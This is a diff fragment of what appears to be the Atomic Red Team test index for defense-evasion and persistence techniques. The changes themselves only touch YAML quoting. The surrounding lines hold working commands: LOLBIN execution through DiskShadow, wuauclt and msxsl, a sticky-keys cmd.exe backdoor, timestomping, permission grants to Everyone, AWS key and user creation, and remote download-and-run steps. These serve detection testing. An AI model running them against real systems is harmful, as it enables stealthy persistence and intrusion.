description: 'Emulates attack with a DiskShadow.exe (LOLBIN installed by default
on Windows) being used to execute arbitrary commands Reference: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -40303,17 +40303,17 @@ defense-evasion:
- description: txt file must exist on disk at specified location (#{txt_payload})
prereq_command: 'if (Test-Path #{txt_payload}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{txt_payload}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/T1218.txt" -OutFile "#{txt_payload}"
- description: DiskShadow.exe must exist on disk at specified location (#{dspath})
prereq_command: 'if (Test-Path #{dspath}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'echo "DiskShadow.exe not found on disk at expected location"
-'
+ '
executor:
command: "#{dspath} -S #{txt_payload} \n"
name: powershell
@@ -40333,17 +40333,17 @@ defense-evasion:
dependencies:
- description: 'DLL to load must exist on disk as specified location (#{arbitrary_dll})
-'
+ '
prereq_command: 'if (test-path "#{arbitrary_dll}"){exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{arbitrary_dll}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/bin/calc.dll?raw=true" -OutFile "#{arbitrary_dll}"
executor:
command: 'wuauclt.exe /UpdateDeploymentProvider #{arbitrary_dll} /RunHandlerComServer
-'
+ '
cleanup_command: taskkill /f /im calculator.exe > nul 2>&1
name: command_prompt
T1216:
@@ -40408,14 +40408,14 @@ defense-evasion:
executor:
command: 'C:\windows\system32\SyncAppvPublishingServer.vbs "\n;#{command_to_execute}"
-'
+ '
name: command_prompt
- name: manage-bde.wsf Signed Script Command Execution
auto_generated_guid: 2a8f2d3c-3dec-4262-99dd-150cb2a4d63a
description: 'Executes the signed manage-bde.wsf script with options to execute
an arbitrary command.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -40429,7 +40429,7 @@ defense-evasion:
cscript %windir%\System32\manage-bde.wsf
cleanup_command: 'set comspec=%windir%\System32\cmd.exe
-'
+ '
name: command_prompt
T1027.002:
technique:
@@ -40504,10 +40504,10 @@ defense-evasion:
executor:
command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin
-'
+ '
cleanup_command: 'rm /tmp/packed_bin
-'
+ '
name: sh
- name: Binary packed by UPX, with modified headers (linux)
auto_generated_guid: f06197f8-ff46-48c2-a0c6-afc1b50665e1
@@ -40526,10 +40526,10 @@ defense-evasion:
executor:
command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin
-'
+ '
cleanup_command: 'rm /tmp/packed_bin
-'
+ '
name: sh
- name: Binary simply packed by UPX
auto_generated_guid: b16ef901-00bb-4dda-b4fc-a04db5067e20
@@ -40546,10 +40546,10 @@ defense-evasion:
executor:
command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin
-'
+ '
cleanup_command: 'rm /tmp/packed_bin
-'
+ '
name: sh
- name: Binary packed by UPX, with modified headers
auto_generated_guid: 4d46e16b-5765-4046-9f25-a600d3e65e4d
@@ -40568,10 +40568,10 @@ defense-evasion:
executor:
command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin
-'
+ '
cleanup_command: 'rm /tmp/packed_bin
-'
+ '
name: sh
T1036.006:
technique:
@@ -40625,7 +40625,7 @@ defense-evasion:
auto_generated_guid: 89a7dd26-e510-4c9f-9b15-f3bae333360f
description: 'Space After Filename
-'
+ '
supported_platforms:
- macos
executor:
@@ -40637,7 +40637,7 @@ defense-evasion:
auto_generated_guid: b95ce2eb-a093-4cd8-938d-5258cef656ea
description: 'Space after filename.
-'
+ '
supported_platforms:
- macos
- linux
@@ -40859,7 +40859,7 @@ defense-evasion:
auto_generated_guid: 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e
description: 'Common Sudo enumeration methods.
-'
+ '
supported_platforms:
- macos
- linux
@@ -40873,7 +40873,7 @@ defense-evasion:
This is dangerous to modify without using ''visudo'', do not do this on a
production system.
-'
+ '
supported_platforms:
- macos
- linux
@@ -40888,7 +40888,7 @@ defense-evasion:
description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous
to modify without using ''visudo'', do not do this on a production system.
-'
+ '
supported_platforms:
- macos
- linux
@@ -41002,7 +41002,7 @@ defense-evasion:
| grep -iE ''Oracle|VirtualBox|VMWare|Parallels'') then echo "Virtualization
Environment detected"; fi;
-'
+ '
- name: Detect Virtualization Environment (Windows)
auto_generated_guid: 502a7dc4-9d6f-4d28-abf2-f0e84692562d
description: 'Windows Management Instrumentation(WMI) objects contains system
@@ -41012,7 +41012,7 @@ defense-evasion:
This is meant to find the result of Not supported, which is the result if
run in a virtual machine
-'
+ '
supported_platforms:
- windows
executor:
@@ -41029,7 +41029,7 @@ defense-evasion:
the system. If it''s a virtual machine, one of the device manufacturer will
be a Virtualization Software.
-'
+ '
supported_platforms:
- macos
executor:
@@ -41039,7 +41039,7 @@ defense-evasion:
''Oracle|VirtualBox|VMWare|Parallels'') then echo ''Virtualization Environment
detected''; fi;
-'
+ '
- name: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows)
auto_generated_guid: 4a41089a-48e0-47aa-82cb-5b81a463bc78
description: "Windows Management Instrumentation(WMI) objects contain system
@@ -41294,7 +41294,7 @@ defense-evasion:
executor:
command: 'start #{docx_file}
-'
+ '
name: command_prompt
T1055.003:
technique:
@@ -41565,7 +41565,7 @@ defense-evasion:
auto_generated_guid: 5f9113d5-ed75-47ed-ba23-ea3573d05810
description: 'Stomps on the access timestamp of a file
-'
+ '
supported_platforms:
- linux
- macos
@@ -41577,13 +41577,13 @@ defense-evasion:
executor:
command: 'touch -a -t 197001010000.00 #{target_filename}
-'
+ '
name: sh
- name: Set a file's modification timestamp
auto_generated_guid: 20ef1523-8758-4898-b5a2-d026cc3d2c52
description: 'Stomps on the modification timestamp of a file
-'
+ '
supported_platforms:
- linux
- macos
@@ -41595,7 +41595,7 @@ defense-evasion:
executor:
command: 'touch -m -t 197001010000.00 #{target_filename}
-'
+ '
name: sh
- name: Set a file's creation timestamp
auto_generated_guid: 8164a4a6-f99c-4661-ac4f-80f5e4e78d2b
@@ -41641,7 +41641,7 @@ defense-evasion:
executor:
command: 'touch -acmr #{reference_file_path} #{target_file_path}
-'
+ '
name: sh
- name: Windows - Modify file creation timestamp with PowerShell
auto_generated_guid: b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c
@@ -41664,10 +41664,10 @@ defense-evasion:
- description: 'A file must exist at the path (#{file_path}) to change the creation
time on
-'
+ '
prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Path #{file_path} -Force | Out-Null
Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null
@@ -41675,10 +41675,10 @@ defense-evasion:
command: 'Get-ChildItem #{file_path} | % { $_.CreationTime = "#{target_date_time}"
}
-'
+ '
cleanup_command: 'Remove-Item #{file_path} -Force -ErrorAction Ignore
-'
+ '
name: powershell
- name: Windows - Modify file last modified timestamp with PowerShell
auto_generated_guid: f8f6634d-93e1-4238-8510-f8a90a20dcf2
@@ -41701,10 +41701,10 @@ defense-evasion:
- description: 'A file must exist at the path (#{file_path}) to change the modified
time on
-'
+ '
prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Path #{file_path} -Force | Out-Null
Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null
@@ -41712,10 +41712,10 @@ defense-evasion:
command: 'Get-ChildItem #{file_path} | % { $_.LastWriteTime = "#{target_date_time}"
}
-'
+ '
cleanup_command: 'Remove-Item #{file_path} -Force -ErrorAction Ignore
-'
+ '
name: powershell
- name: Windows - Modify file last access timestamp with PowerShell
auto_generated_guid: da627f63-b9bd-4431-b6f8-c5b44d061a62
@@ -41738,10 +41738,10 @@ defense-evasion:
- description: 'A file must exist at the path (#{file_path}) to change the last
access time on
-'
+ '
prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Path #{file_path} -Force | Out-Null
Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null
@@ -41749,10 +41749,10 @@ defense-evasion:
command: 'Get-ChildItem #{file_path} | % { $_.LastAccessTime = "#{target_date_time}"
}
-'
+ '
cleanup_command: 'Remove-Item #{file_path} -Force -ErrorAction Ignore
-'
+ '
name: powershell
- name: Windows - Timestomp a File
auto_generated_guid: d7512c33-3a75-4806-9893-69abc3ccdd43
@@ -41770,25 +41770,25 @@ defense-evasion:
dependencies:
- description: 'timestomp.ps1 must be present in #{file_path}.
-'
+ '
prereq_command: 'if (Test-Path #{file_path}\timestomp.ps1) {exit 0} else {exit
1}
-'
+ '
get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/mitre-attack/attack-arsenal/bc0ba1d88d026396939b6816de608cb279bfd489/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/timestomp.ps1"
-OutFile "#{file_path}\timestomp.ps1"
-'
+ '
- description: 'kxwn.lock must be present in #{file_path}.
-'
+ '
prereq_command: 'if (Test-Path -path "#{file_path}\kxwn.lock") {exit 0} else
{exit 1}
-'
+ '
get_prereq_command: 'New-Item -Path #{file_path}\kxwn.lock -ItemType File
-'
+ '
executor:
command: |
import-module #{file_path}\timestomp.ps1
@@ -42764,10 +42764,10 @@ defense-evasion:
- description: 'Test requrires a file to take ownership of to be located at
(#{file_folder_to_own})
-'
+ '
prereq_command: 'IF EXIST #{file_folder_to_own} ( EXIT 0 ) ELSE ( EXIT 1 )
-'
+ '
get_prereq_command: |
mkdir #{file_folder_to_own}
echo T1222.001_takeown1 >> #{file_folder_to_own}\T1222.001_takeown1.txt
@@ -42775,7 +42775,7 @@ defense-evasion:
executor:
command: 'takeown.exe /f #{file_folder_to_own} /r
-'
+ '
name: command_prompt
- name: cacls - Grant permission to specified user or group recursively
auto_generated_guid: a8206bcc-f282-40a9-a389-05d9c0263485
@@ -42798,10 +42798,10 @@ defense-evasion:
dependencies:
- description: 'Test requrires a file to modify to be located at (#{file_or_folder})
-'
+ '
prereq_command: 'IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 )
-'
+ '
get_prereq_command: |
mkdir #{file_or_folder}
echo T1222.001_cacls1 >> #{file_or_folder}\T1222.001_cacls1.txt
@@ -42809,7 +42809,7 @@ defense-evasion:
executor:
command: 'icacls.exe #{file_or_folder} /grant #{user_or_group}:F
-'
+ '
name: command_prompt
- name: attrib - Remove read-only attribute
auto_generated_guid: bec1e95c-83aa-492e-ab77-60c71bbd21b0
@@ -42827,10 +42827,10 @@ defense-evasion:
dependencies:
- description: 'Test requrires a file to modify to be located at (#{file_or_folder})
-'
+ '
prereq_command: 'IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 )
-'
+ '
get_prereq_command: |
mkdir #{file_or_folder}
echo T1222.001_attrib1 >> #{file_or_folder}\T1222.001_attrib1.txt
@@ -42840,7 +42840,7 @@ defense-evasion:
executor:
command: 'attrib.exe -r #{file_or_folder}\*.* /s
-'
+ '
name: command_prompt
- name: attrib - hide file
auto_generated_guid: 32b979da-7b68-42c9-9a99-0e39900fc36c
@@ -42863,7 +42863,7 @@ defense-evasion:
attrib.exe +h #{file_or_folder}\T1222.001_attrib2.txt
cleanup_command: 'del /A:H #{file_or_folder}\T1222.001_attrib*.txt >nul 2>&1
-'
+ '
name: command_prompt
- name: Grant Full Access to folder for Everyone - Ryuk Ransomware Style
auto_generated_guid: ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6
@@ -42888,18 +42888,18 @@ defense-evasion:
- description: 'Backup of original folder permissions should exist (for use
in cleanup commands)
-'
+ '
prereq_command: 'IF EXIST #{file_path} ( EXIT 0 ) ELSE ( EXIT 1 )
-'
+ '
get_prereq_command: 'icacls #{path} /save #{file_path} /t /q >nul 2>&1
-'
+ '
executor:
command: icacls "#{path}" /grant Everyone:F /T /C /Q
cleanup_command: 'icacls ''#{path}'' /restore #{file_path} /q >nul 2>&1
-'
+ '
name: command_prompt
elevation_required: true
T1220:
@@ -43013,37 +43013,37 @@ defense-evasion:
dependencies:
- description: 'XML file must exist on disk at specified location (#{xmlfile})
-'
+ '
prereq_command: 'if (Test-Path #{xmlfile}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{xmlfile}) -ErrorAction Ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslxmlfile.xml" -OutFile "#{xmlfile}"
- description: 'XSL file must exist on disk at specified location (#{xslfile})
-'
+ '
prereq_command: 'if (Test-Path #{xslfile}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{xslfile}) -ErrorAction Ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslscript.xsl" -OutFile "#{xslfile}"
- description: 'msxsl.exe must exist on disk at specified location (#{msxsl_exe})
-'
+ '
prereq_command: 'if (Test-Path #{msxsl_exe}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Invoke-WebRequest "https://web.archive.org/web/20200803205229if_/https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe"
-OutFile "#{msxsl_exe}"
-'
+ '
executor:
command: "#{msxsl_exe} #{xmlfile} #{xslfile}\n"
cleanup_command: 'del #{msxsl_exe} >nul 2>&1
-'
+ '
name: command_prompt
- name: MSXSL Bypass using remote files
auto_generated_guid: a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985
@@ -43071,26 +43071,26 @@ defense-evasion:
dependencies:
- description: 'msxsl.exe must exist on disk at specified location (#{msxsl_exe})
-'
+ '
prereq_command: 'if (Test-Path #{msxsl_exe}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Invoke-WebRequest "https://web.archive.org/web/20200803205229if_/https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe"
-OutFile "#{msxsl_exe}"
-'
+ '
executor:
command: "#{msxsl_exe} #{xmlfile} #{xslfile}\n"
cleanup_command: 'del -Path #{msxsl_exe} >nul 2>&1
-'
+ '
name: command_prompt
- name: WMIC bypass using local XSL file
auto_generated_guid: 1b237334-3e21-4a0c-8178-b8c996124988
description: 'Executes the code specified within a XSL script using a local
payload.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -43106,17 +43106,17 @@ defense-evasion:
dependencies:
- description: 'XSL file must exist on disk at specified location (#{local_xsl_file})
-'
+ '
prereq_command: 'if (Test-Path #{local_xsl_file}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{local_xsl_file}) -ErrorAction Ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/wmicscript.xsl" -OutFile "#{local_xsl_file}"
executor:
command: 'wmic #{wmic_command} /FORMAT:"#{local_xsl_file}"
-'
+ '
name: command_prompt
- name: WMIC bypass using remote XSL file
auto_generated_guid: 7f5be499-33be-4129-a560-66021f379b9b
@@ -43124,7 +43124,7 @@ defense-evasion:
payload. Open Calculator.exe when test successfully executed, while AV turned
off.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -43139,7 +43139,7 @@ defense-evasion:
executor:
command: 'wmic #{wmic_command} /FORMAT:"#{remote_xsl_file}"
-'
+ '
name: command_prompt
persistence:
T1546.008:
@@ -43233,7 +43233,7 @@ persistence:
description: 'Comma separated list of system binaries to which you want
to attach each #{attached_process}. Default: "osk.exe"
-'
+ '
type: String
default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe,
atbroker.exe
@@ -43241,7 +43241,7 @@ persistence:
description: 'Full path to process to attach to target in #{parent_list}.
Default: cmd.exe
-'
+ '
type: Path
default: C:\windows\system32\cmd.exe
executor:
@@ -43275,7 +43275,7 @@ persistence:
auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3
description: 'Replace sticky keys binary (sethc.exe) with cmd.exe
-'
+ '
supported_platforms:
- windows
executor:
@@ -43286,7 +43286,7 @@ persistence:
copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
cleanup_command: 'copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe
-'
+ '
name: command_prompt
elevation_required: true
T1098:
@@ -43363,7 +43363,7 @@ persistence:
auto_generated_guid: 5598f7cb-cf43-455e-883a-f6008c5d46af
description: 'Manipulate Admin Account Name
-'
+ '
supported_platforms:
- windows
executor:
@@ -43429,7 +43429,7 @@ persistence:
dependencies:
- description: 'PS Module ActiveDirectory
-'
+ '
prereq_command: "Try {\n Import-Module ActiveDirectory -ErrorAction Stop
| Out-Null\n exit 0\n} \nCatch {\n exit 1\n}\n"
get_prereq_command: |
@@ -43452,14 +43452,14 @@ persistence:
cleanup_command: 'Get-ADUser -LDAPFilter "(&(samaccountname=#{account_prefix}-*)(givenName=Test))"
| Remove-ADUser -Confirm:$False
-'
+ '
name: powershell
- name: AWS - Create a group and add a user to that group
auto_generated_guid: 8822c3b0-d9f9-4daf-a043-49f110a31122
description: 'Adversaries create AWS group, add users to specific to that group
to elevate their privilieges to gain more accesss
-'
+ '
supported_platforms:
- iaas:aws
input_arguments:
@@ -43471,14 +43471,14 @@ persistence:
- description: 'Check if the user exists, we can only add a user to a group
if the user exists.
-'
+ '
prereq_command: 'aws iam list-users | grep #{username}
-'
+ '
get_prereq_command: 'echo Please run atomic test T1136.003, before running
this atomic test
-'
+ '
executor:
command: |
aws iam create-group --group-name #{username}
@@ -43520,14 +43520,14 @@ persistence:
dependencies:
- description: 'AzureAD module must be installed.
-'
+ '
prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue)
{exit 0} else {exit 1}} catch {exit 1}
-'
+ '
get_prereq_command: 'Install-Module -Name AzureAD -Force
-'
+ '
executor:
command: |
Import-Module -Name AzureAD
@@ -43589,14 +43589,14 @@ persistence:
dependencies:
- description: 'AzureAD module must be installed.
-'
+ '
prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue)
{exit 0} else {exit 1}} catch {exit 1}
-'
+ '
get_prereq_command: 'Install-Module -Name AzureAD -Force
-'
+ '
executor:
command: |
Import-Module -Name AzureAD
@@ -43663,14 +43663,14 @@ persistence:
dependencies:
- description: 'Az.Resources module must be installed.
-'
+ '
prereq_command: 'try {if (Get-InstalledModule -Name Az.Resources -ErrorAction
SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
-'
+ '
get_prereq_command: 'Install-Module -Name Az.Resources -Force
-'
+ '
executor:
command: |
Import-Module -Name Az.Resources
@@ -43743,14 +43743,14 @@ persistence:
dependencies:
- description: 'Az.Resources module must be installed.
-'
+ '
prereq_command: 'try {if (Get-InstalledModule -Name Az.Resources -ErrorAction
SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
-'
+ '
get_prereq_command: 'Install-Module -Name Az.Resources -Force
-'
+ '
executor:
command: "Import-Module -Name Az.Resources\n$PWord = ConvertTo-SecureString
-String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName
@@ -43819,14 +43819,14 @@ persistence:
dependencies:
- description: 'AzureAD module must be installed.
-'
+ '
prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue)
{exit 0} else {exit 1}} catch {exit 1}
-'
+ '
get_prereq_command: 'Install-Module -Name AzureAD -Force
-'
+ '
executor:
command: "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String
\"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName
@@ -44068,7 +44068,7 @@ persistence:
command: 'powershell -c "iwr -URI ''#{xll_url}'' -o ''#{local_file}''; IEX
((new-object -ComObject excel.application).RegisterXLL(''$env:tmp\HelloWorldXll.xll''))"
-'
+ '
T1098.001:
technique:
object_marking_refs:
@@ -44175,14 +44175,14 @@ persistence:
dependencies:
- description: 'AzureAD module must be installed.
-'
+ '
prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue)
{exit 0} else {exit 1}} catch {exit 1}
-'
+ '
get_prereq_command: 'Install-Module -Name AzureAD -Force
-'
+ '
executor:
command: |
Import-Module -Name AzureAD
@@ -44255,14 +44255,14 @@ persistence:
dependencies:
- description: 'AzureAD module must be installed.
-'
+ '
prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue)
{exit 0} else {exit 1}} catch {exit 1}
-'
+ '
get_prereq_command: 'Install-Module -Name AzureAD -Force
-'
+ '
executor:
command: |
Import-Module -Name AzureAD
@@ -44306,7 +44306,7 @@ persistence:
description: 'Adversaries create their own new access and secret keys to programatically
interact with AWS environment, which is already compromised
-'
+ '
supported_platforms:
- iaas:aws
input_arguments:
@@ -44317,14 +44317,14 @@ persistence:
dependencies:
- description: 'Check if the user exists.
-'
+ '
prereq_command: 'aws iam list-users | grep #{username}
-'
+ '
get_prereq_command: 'echo Please run atomic test T1136.003, before running
this atomic
-'
+ '
executor:
command: |
aws iam create-access-key --user-name #{username} > $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds
@@ -44519,11 +44519,11 @@ persistence:
- description: 'Reg files must exist on disk at specified locations (#{registry_file}
and #{registry_cleanup_file})
-'
+ '
prereq_command: 'if ((Test-Path #{registry_file}) -and (Test-Path #{registry_cleanup_file}))
{exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory (split-path #{registry_file}) -ErrorAction ignore | Out-Null
@@ -44532,11 +44532,11 @@ persistence:
- description: 'DLL''s must exist in the C:\Tools directory (T1546.010.dll and
T1546.010x86.dll)
-'
+ '
prereq_command: 'if ((Test-Path c:\Tools\T1546.010.dll) -and (Test-Path c:\Tools\T1546.010x86.dll))
{exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory C:\Tools -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010.dll" -OutFile C:\Tools\T1546.010.dll
@@ -44544,10 +44544,10 @@ persistence:
executor:
command: 'reg.exe import #{registry_file}
-'
+ '
cleanup_command: 'reg.exe import #{registry_cleanup_file} >nul 2>&1
-'
+ '
name: command_prompt
elevation_required: true
T1546.011:
@@ -44655,31 +44655,31 @@ persistence:
- description: 'Shim database file must exist on disk at specified location
(#{file_path})
-'
+ '
prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory (split-path #{file_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicShimx86.sdb" -OutFile "#{file_path}"
- description: 'AtomicTest.dll must exist at c:\Tools\AtomicTest.dll
-'
+ '
prereq_command: 'if (Test-Path c:\Tools\AtomicTest.dll) {exit 0} else {exit
1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path c:\Tools\AtomicTest.dll) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicTest.dll" -OutFile c:\Tools\AtomicTest.dll
executor:
command: 'sdbinst.exe #{file_path}
-'
+ '
cleanup_command: 'sdbinst.exe -u #{file_path} >nul 2>&1
-'
+ '
name: command_prompt
elevation_required: true
- name: New shim database files created in the default shim database directory
@@ -44786,7 +44786,7 @@ persistence:
description: 'This test submits a command to be run in the future by the `at`
daemon.
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -44802,30 +44802,30 @@ persistence:
dependencies:
- description: 'The `at` and `atd` executables must exist in the PATH
-'
+ '
prereq_command: 'which at && which atd
-'
+ '
get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found
in the PATH (Package name: `at`)''
-'
+ '
- description: 'The `atd` daemon must be running
-'
+ '
prereq_command: 'systemctl status atd || service atd status
-'
+ '
get_prereq_command: 'echo ''Please start the `atd` daemon (sysv: `service
atd start` ; systemd: `systemctl start atd`)''
-'
+ '
executor:
name: sh
elevation_required: false
command: 'echo "#{at_command}" | at #{time_spec}
-'
+ '
T1053.002:
technique:
object_marking_refs:
@@ -44922,7 +44922,7 @@ persistence:
elevation_required: false
command: 'at 13:20 /interactive cmd
-'
+ '
T1547.002:
technique:
object_marking_refs:
@@ -45106,10 +45106,10 @@ persistence:
command: 'bitsadmin.exe /transfer /Download /priority Foreground #{remote_file}
#{local_file}
-'
+ '
cleanup_command: 'del #{local_file} >nul 2>&1
-'
+ '
name: command_prompt
- name: Bitsadmin Download (PowerShell)
auto_generated_guid: f63b8bc4-07e5-4112-acba-56f646f3f0bc
@@ -45133,10 +45133,10 @@ persistence:
command: 'Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination
#{local_file}
-'
+ '
cleanup_command: 'Remove-Item #{local_file} -ErrorAction Ignore
-'
+ '
name: powershell
- name: Persist, Download, & Execute
auto_generated_guid: 62a06ec5-5754-47d2-bcfc-123d8314c6ae
@@ -45174,7 +45174,7 @@ persistence:
bitsadmin.exe /complete #{bits_job_name}
cleanup_command: 'del #{local_file} >nul 2>&1
-'
+ '
name: command_prompt
- name: Bits download using desktopimgdownldr.exe (cmd)
auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114
@@ -45206,10 +45206,10 @@ persistence:
command: 'set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file}
/eventName:desktopimgdownldr
-'
+ '
cleanup_command: 'del #{cleanup_path}\#{cleanup_file} >nul 2>&1
-'
+ '
name: command_prompt
T1547:
technique:
@@ -45305,7 +45305,7 @@ persistence:
auto_generated_guid: cb01b3da-b0e7-4e24-bf6d-de5223526785
description: 'Install a driver via pnputil.exe lolbin
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -45316,7 +45316,7 @@ persistence:
executor:
command: 'pnputil.exe /add-driver "#{driver_inf}"
-'
+ '
name: command_prompt
T1037:
technique:
@@ -45552,7 +45552,7 @@ persistence:
auto_generated_guid: cb790029-17e6-4c43-b96f-002ce5f10938
description: 'Create a file called test.wma, with the duration of 30 seconds
-'
+ '
supported_platforms:
- linux
- windows
@@ -45572,7 +45572,7 @@ persistence:
sent from a compromised host. This will install one (of many) available VPNS
in the Edge add-on store.
-'
+ '
supported_platforms:
- windows
- macos
@@ -45692,7 +45692,7 @@ persistence:
- description: "#{file_name} must be present\n"
prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
@@ -45737,7 +45737,7 @@ persistence:
- description: "#{file_name} must be present\n"
prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
@@ -45775,7 +45775,7 @@ persistence:
- description: "#{file_name} must be present\n"
prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
@@ -45892,10 +45892,10 @@ persistence:
executor:
command: 'assoc #{extension_to_change}=#{target_extension_handler}
-'
+ '
cleanup_command: 'assoc #{extension_to_change}=#{original_extension_handler}
-'
+ '
name: command_prompt
elevation_required: true
T1136.003:
@@ -45965,7 +45965,7 @@ persistence:
activity do not interupt the normal functions of the compromised users and
can remain undetected for a long time
-'
+ '
supported_platforms:
- iaas:aws
input_arguments:
@@ -45976,21 +45976,21 @@ persistence:
dependencies:
- description: 'Check if ~/.aws/credentials file has a default stanza is configured
-'
+ '
prereq_command: 'cat ~/.aws/credentials | grep "default"
-'
+ '
get_prereq_command: 'echo Please install the aws-cli and configure your AWS
defult profile using: aws configure
-'
+ '
executor:
command: 'aws iam create-user --user-name #{username}
-'
+ '
cleanup_command: 'aws iam delete-user --user-name #{username}
-'
+ '
name: sh
elevation_required: false
T1078.004:
@@ -46059,7 +46059,7 @@ persistence:
description: 'GCP Service Accounts can be used to gain intial access as well
as maintain persistence inside Google Cloud.
-'
+ '
supported_platforms:
- google-workspace
- windows
@@ -46094,20 +46094,20 @@ persistence:
cleanup_command: 'gcloud iam service-accounts delete #{service-account-email}
--quiet
-'
+ '
dependency_executor_name: gcloud
dependencies:
- description: 'Requires gcloud
-'
+ '
prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit
1; fi;
-'
+ '
get_prereq_command: 'echo "Please Install Google Cloud SDK before running
this atomic test : https://cloud.google.com/sdk/docs/install"
-'
+ '
T1542.002:
